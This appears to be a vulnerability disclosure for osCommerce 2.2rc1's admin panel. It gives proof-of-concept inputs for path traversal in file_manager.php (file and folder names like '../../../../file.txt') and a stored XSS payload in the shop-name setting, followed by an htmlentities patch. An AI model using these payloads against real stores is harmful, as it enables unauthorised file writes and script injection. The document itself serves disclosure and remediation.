#####################################################################################################
#
# Module 	: osCommerce
# Version	: 2.2rc1
# Edited by	: oscommerce.com/
# Download	: http://www.oscommerce.com/
# Download(fr)	: http://www.oscommerce-fr.info/portail/index.php?option=com_remository&Itemid=183
#
# Vulnerability : Multiple Vulnerability
#
# Author	: Jonathan Salwan
# Mail		: submit [AT] shell-storm.org
# Web		: http://www.shell-storm.org
#
####################################################################################################
#                              Create file on the server 
#                                    Proof of Concept
####################################################################################################
# 
# File 		: catalog/admin/file_manager.php
# Code (row 146): 
# 
#				if ($action == 'new_file') {
#      					$filename_input_field = tep_draw_input_field('filename');
# 
# Use vul:
# --------
# http://localhost/catalog/admin/file_manager.php?action=new_file
# file name => ../../../../../../../../file.txt
# 
####################################################################################################
#                              Create folder on the server 
#                                    Proof of Concept
####################################################################################################
#
# File 		: catalog/admin/file_manager.php
# Code (row 296): 
#
#                     		$contents[] = array('text' => '<br>' . TEXT_FILE_NAME . '<br>' . tep_draw_input_field('folder_name'));
#
# Use vul:
# --------
# http://localhost/catalog/admin/file_manager.php?action=new_folder
# folder name => ../../../../../../../../folder_test
#
####################################################################################################
#                            XSS Vulnerability Proof of Concept 
####################################################################################################
#
# File 		: catalog/admin/index.php
# Code (row 58) :
#
#				<td class="pageHeading"><?php echo STORE_NAME; ?></td>
#
#
# Use vul: 
# --------
# http://localhost/catalog/admin/configuration.php?gID=1&cID=1&action=edit
# Shop Name => <script>alert('xss');</script>
#
####################################################################################################
#                               PATCH  catalog/admin/index.php
####################################################################################################
#
# replaces code : <td class="pageHeading"><?php echo STORE_NAME; ?></td>
#	   to	: <td class="pageHeading"><?php echo htmlentities(STORE_NAME); ?></td>
#
#